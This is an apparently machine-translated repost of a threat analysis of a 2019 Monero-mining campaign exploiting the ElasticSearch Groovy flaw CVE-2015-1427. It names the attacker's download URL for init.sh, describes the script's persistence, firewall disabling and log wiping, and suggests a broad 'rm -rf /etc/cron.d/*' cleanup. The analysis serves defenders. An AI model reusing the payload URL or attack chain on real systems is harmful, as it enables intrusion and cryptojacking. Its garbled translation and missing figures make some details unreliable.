Shulou(Shulou.com)05/31 Report--

How to use the ElasticSearch Groovy loophole to analyze the Monroe coin mining event, I believe that many inexperienced people do not know what to do about it. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

I. Overview

On June 13, 2019, Antian Honeynet caught an attack that exploited a CVE-2015-1427 (ElasticSearch Groovy) remote command execution vulnerability. The principle of the vulnerability is that Elaticsearch uses groovy as a scripting language and uses the sandboxie mechanism based on blacklist and whitelist to restrict the execution of dangerous code, but this mechanism is not strict enough and can be bypassed, resulting in remote code execution. We made a detailed sample analysis of the incident and gave suggestions for prevention and repair.

Sample Analysis 2.1 key attack payload

From the point of view of the attack payload, the attacker uses groovy as the scripting language to send a json script with a malicious link as http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh to the _ search?pretty page to download the malicious shell script, so as to realize the remote code attack and carry out mining behavior.

Figure 2-1 packet content

The core code after decryption:

Figure 2-2 Core Code

2.2 sample analysis

1) intrusion script Analysis-init.sh

The attacker downloads and executes the malicious script init.sh through http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh to implant the Dog mining program, while scanning the host and other operations.

Figure 2-3 turn off the firewall

After that, close the firewall, close selinux and release the occupied resources, kill other mining-related processes, set scheduled tasks (download executable update.sh every 30 minutes), obtain ssh permissions, forward and modify iptables rules, and clean up relevant operation history, logs and other operations.

Figure 2-4 check and kill other existing mining processes

Figure 2-5 set up scheduled tasks

Figure 2-6 malicious script download address, backup address and size setting

Figure 2-7 cleaning up related logs and history

During this process, the script checks whether the three processes sysupdate, networkservice, and sysguard are started, and if not, start them.

Figure 2-8 when one of them is dropped by kill, the scheduling file restarts

2) sample analysis-sysguard, networkservice, sysupdate

The three samples are written in go language and shelled in UPX, and the corresponding main_main function structures are as follows:

Figure 2-9 sysguard-main_main function structure

Figure 2-10 networkservice-main_main function structure

Figure 2-11 sysupdate-main function

By comparing with the previously captured systemctI samples, it is found that the attack is divided into three processes: mining, scanning and function call. And the relevant exploit function and scan function are found in the networkservice sample.

Figure 2-12 networkservice scan function

By comparing the previously captured samples, it is found that the two attacks are similar, except that this attack is carried out through three processes: sysguard, networkservice (scan) and sysupdate. This also means that when it is found that the server is infected, all three processes should be kill at the same time.

3) configuration file-config.json

In the downloaded configuration file, we found several mine pool addresses:

Table 2-1 list of ore pools

Figure 2-13 s profile

3. Affected services and loopholes

Table 3-1 affected services and vulnerabilities

IV. IOC

Table 4-1 attack IP

Table 4-2 URL

Table 4-3 MD5

5. prevention and repair recommendations:

A) ensure that the system and applications download and update the latest official patches in a timely manner

B) prohibit the use of weak passwords

C) periodically check for server exceptions, such as persistent high CPU usage and disk anomalies

D) install terminal threat security protection products

Repair recommendations:

A) disconnection, backup of important crontab, shutdown or deletion of scheduled tasks: systemctl stop crontab or rm-rf / etc/cron.d/*

B) Lock malicious files in crontab

C) View and kill virus processes: kill sysguard, networkservice and sysupdate processes at the same time

D) Delete virus-related files

E) after confirmation, restart the server and install the vulnerability patch.

After reading the above, do you know how to use the ElasticSearch Groovy loophole to analyze the Monroe coin mining event? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.